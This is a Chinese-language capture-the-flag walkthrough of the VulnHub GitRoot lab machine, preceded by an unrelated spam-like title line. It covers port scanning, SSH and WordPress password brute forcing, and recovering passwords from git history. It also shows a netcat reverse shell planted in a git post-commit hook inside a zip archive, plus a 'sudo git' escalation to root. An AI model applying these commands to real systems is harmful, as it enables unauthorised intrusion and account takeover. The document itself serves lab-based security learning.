中国建设银行官网站保本理财设计logo的ai软件

靶机地址：https://download.vulnhub.com/gitroot/GitRoot.ova

1. 主机发现

目前只知道目标靶机在192.168.56.xx网段，通过如下的命令，看看这个网段上在线的主机。

$ nmap -sP 192.168.56.0/24

因为56.100和56.108是已知主机，所以锁定靶机地址为192.168.56.103。

2. 端口扫描

通过下面的命令扫描一下靶机的端口。

$ sudo nmap -p- 192.168.56.103

端口不多。

3. 服务枚举

通过下面的命令枚举一下端口上运行的服务。

$ sudo nmap -p22,80,11211 -A -sT -sV 192.168.56.103

扫出来的信息也不是很多，直接上手看看再说。

4. 服务探查

先通过浏览器访问一下80端口。

就是一个简单的页面，不过也是得到了一些信息，人名Jen，可能又是wordpress，还有个域名地址wp.gitroot.vuln。看一下sourcecode。

没啥奇怪的，直接扫描一下目录。

扫描出来的内容少的可怜啊，再用dirb挂上big字典扫描一下试试看。

$ dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt

是多了一点，貌似也没啥实质性内容。再看看11211端口上是啥，上网搜了一下，貌似是这Memcached的服务端口。

$ telnet 192.168.56.103 11211

如上图所示，这说明端口未加任何防护，通过version命令看是否可以看到版本信息。

没啥动静，通过stats命令查看一下常规统计信息。

仍然没反应，获取一下slab统计信息。

还是没反应，直接用libmemcached-tools工具看是否可以转储数据出来。先安装一下。

$ sudo apt install libmemcached-tools

然后运行一下。

$ memcstat --servers=192.168.56.103

竟然超时了，再试一下，仍然超时。到这里了也没啥收获，直接用用户jen看是不是可以爆破一下ssh登录吧。

$ hydra -l jen -P /usr/share/wordlists/rockyou.txt -t 2 -vV -e ns 192.168.56.103 ssh

可是一直没有爆破成功。感觉没有头绪了，想起前面页面上还有个域名wp.gitroot.vuln没有用到，还有可能的wordpress在这个域名上。将靶机的地址指向这个域名，再枚举一下目录。

$ dirsearch -u http://192.168.56.103

没有扫出来，挂上big字典试试。

$ dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt -X .php 

没效果，既然说到了wordpress，直接用wpscan试试看。

$ wpscan --url wp.gitroot.vuln

扫出了一些东西，加上-e u参数，也没有枚举到用户。不过刚才有个jen用户，直接用这个用户爆破一下试试看。

$ wpscan --url wp.gitroot.vuln -U jen -P /usr/share/wordlists/rockyou.txt

无果，既然用域名能够找到wordpress，直接用这个域名枚举一下目录试试看。

$ dirsearch -u http://wp.gitroot.vuln

确实能够扫出来，进到首页看看，（这里只能用http://wp.gitroot.vuln直接输入域名是不可以的）。

额，又一个用户beth，这个我们前面用wpscan枚举用户的时候，枚举出来了，不过没有细看。

那就直接爆破一下这个用户吧。

仍然无果，hydra爆破一下ssh看看这个用户，也没有爆破出来。看来只能顺着wp的版本和那几个插件入手了。

貌似上图中的有搞头，试试看。

这个在我本地试了一下，没有用，还是挂上big字典扫描一下域名下还有没有其它的php页面吧。

$ dirb http://wp.gitroot.vuln /usr/share/wordlists/dirb/big.txt -X .php

还真多了一个，访问一下看看。

看一下sourcecode。

越来越有靶机的尿性了，难道访问的时候加上id=xxx？试试看吧。

不靠谱，到这里，感觉所有挖出来的线索都使用过了，毫无进展。但是有一点是肯定的，这个靶机有不少隐藏的目录和页面，每次扫描都有新的发现，直接上网搜索一下，这里重点参照了这篇文章（https://blog.csdn.net/cjstang/article/details/125583296），感谢大佬。

我们直接用gobuster看看这个域名下面还有什么隐藏的东西。

$ gobuster dns --delay 2500ms --domain gitroot.vuln -w ~/OSCP/GitRoot/subDomainsBrute-master/dict/subnames.txt

发现了在gitroot.vuln下面还有子域名repo，直接进去看看。

貌似是代码托管的地方，这里还涉及到了两个页面get.php和set.php。手工访问一下这两个页面看看。


看不出啥，直接dirsearch扫描一下这个子域名。

$ dirsearch -u http://repo.gitroot.vuln/

确实是一个代码托管的地方，内容还真是不少，逐个看一下，以我的认知，只在/.git/logs/refs/heads/master下面发现了貌似还有个用户pablo，其他的说实话，我没看出啥，如下图。

还是用hydra爆破一下这个用户吧。

$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt -t 2 -vV -e ns 192.168.56.103 ssh

我这里没有爆破出来，后来查看网上的资料，确实是可以爆破出来的，但是非常耗时，我爆破了一夜，也就是跑了三万多个，最终爆破出来的结果如下图（借用大神的图片）。

登录试一下。

成功了，拿到pablo用户的flag。

5. 系统提权

查看系统信息。

然后运行一下linpeas。
首先有一个highly probale的内核提权漏洞，如下图。

不过这个漏洞跟我们前面查出来的内核版本不匹配，用不上，另外一个是ptrace保护被禁用了，可能导致sudo的tocken被滥用。

可惜的是这几个都试了一下，没有提权成功，再回过头看看pablo用户下还有些啥。除了之前看过的之外，.bash_history定位到了null，不会留有信息，还有就是public了，进去看看.

里面有个message文件，看看内容。

貌似若有所指，感觉还是跟托管的那一堆代码有关系，并且发现另外两个用户也有这个public目录，如下图。

总感觉这个目录跟那个repo有关系。直接搜索一下看看有没有.git文件夹吧。

pablo@GitRoot:~/public$ find / -name ".git" 2>/dev/null

嗯，搜索出来两个，代码应该应该就在这两个地方了，进去看看。

内容基本上一致，更新时间差了一天，我们先看最新的一个，既/opt/auth/.git/，说实话，之前没有对git做过详细研究，不知道git的目录结构，以及哪些文件是我们应该关注的。这里感谢CSDN上maove大佬的文章给了明确的说明，直接上链接https://blog.csdn.net/start_mao/article/details/94609238。从这文章里，我们了解到主要的提交信息保存在logs下的HEAD文件中，进去看看。

完全看不明白干了些啥，不过有一行的commit信息，跟其他的不一样，意思是添加了一些用户？

不过还不知道怎么看具体的提交详情，上网搜了一下，通过git show命令可以查看，具体执行一下。

pablo@GitRoot:/opt/auth/.git/logs$ git show b2ab5f540baab4c299306e16f077d7a6f6556ca3
pablo@GitRoot:/opt/auth/.git/logs$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93

还真有些内容，感觉这个r3vpdmspqdb就是添加的用户的密码，反正就是三个用户，还剩俩：jen和beth，逐个试试。

是beth的密码，先看看这个用户的家目录里面有些啥。这次同样的发现了一个public目录，包含一个名为addToMyRepo.txt，进去内容。

意思是让这个beth用户添加一个zip文件到~jen/public/repos/目录下，jen就会解压并添加到jen用户的repo中。感觉这里貌似可以创建反弹shell。我们直接创建一个shell的反弹shell然后压缩成zip文件放到这个目录下，并建立监听试试看。
包含反弹shell的文件名为my_revers，内容如下。

赋予777的权限，并用zip命令压缩一下。

beth@GitRoot:~$ chmod 777 my_revers
beth@GitRoot:~$ zip myrevers.zip my_revers

额。竟然失败了，看看有没有7z之类的应用。

有7z，那就用7z压缩一下。

beth@GitRoot:~$ 7z a myrevers.zip my_revers

然后把zip包也赋予777权限吧。

beth@GitRoot:~$ chmod 777 myrevers.zip

本地建立监听。

$ nc -lvnp 8888

将zip包放到对应的目录下面。

beth@GitRoot:~$ mv myrevers.zip /home/jen/public/repos/

静静等待，可是我这里一直没有反弹成功。到此为止，没有提权成功，还是回过头去继续看看CSDN上cjstang文章。其实cjstang也是在这里建立反弹shell的，不过没有我这么简单粗暴，仿照cjstang的方法试一下。

beth@GitRoot:~$ mkdir -p .git/hooks
beth@GitRoot:~$ cd .git/hooks/
beth@GitRoot:~/.git/hooks$ echo '#!/bin/bash' > post-commit
beth@GitRoot:~/.git/hooks$ echo '/usr/bin/nc -e /bin/bash 192.168.56.108 8888' >> post-commit

beth@GitRoot:~$ pwd
beth@GitRoot:~$ chmod 777 .git/hooks/post-commit 
beth@GitRoot:~$ 7z a xshell.zip .git/
beth@GitRoot:~$ ls -lah xshell.zip
beth@GitRoot:~$ chmod 777 xshell.zip
beth@GitRoot:~$ cp xshell.zip /home/jen/public/repos/

等了不到一分钟，果真反弹shell有了反应，如下图。

看看能不能用吧。

确实进入了jen用户下面，用pty优化一下shell。

whereis python
/usr/bin/python3.7 -c "import pty; pty.spawn('/bin/bash')"

没啥好搞的了，直接jen用户下运行linpeas吧。
首先发现了一个add.sh脚本，貌似是个定时任务。

除此之外，貌似也没发现什么特别的内容，宣告提权失败，看看cjstang大佬怎么搞的。
cjstang在.viminfo文件中发现了之前的一些命令行历史信息，如下图。
上图中所示的字符串比较可疑，看看是不是jen用户的密码，其它用户的密码都已经拿到了。

binzpbeocnexoe确实是jen用户的密码，可以直接通过密码进行shell的登录。不过刚才我们在jen目录下也没找到啥呀。既然有密码了，再次sudo -l试试看

貌似git命令具有sudo权限，可惜我不会用，gtfobins上搜搜一下。

还真有，试试看。
结果用第二个方式提权貌似成功了，如下图。

jen@GitRoot:~$ sudo git -p help config
!/bin/sh

验证一下，并获取flag。

确实提权成功，本次打靶很不顺利，多亏了网友的文章参照。

6. 写在最后

这个靶机虽然没有自己拿下，这是一个小小的遗憾，值得欣慰的是通过网上的walkthrough，学到了不少之前没有接触过的内容，比如通过gid的HEAD文件查看commit的提交详情、通过sudo git提权等。再次感谢CSDN上的cjstang和maove两位大佬。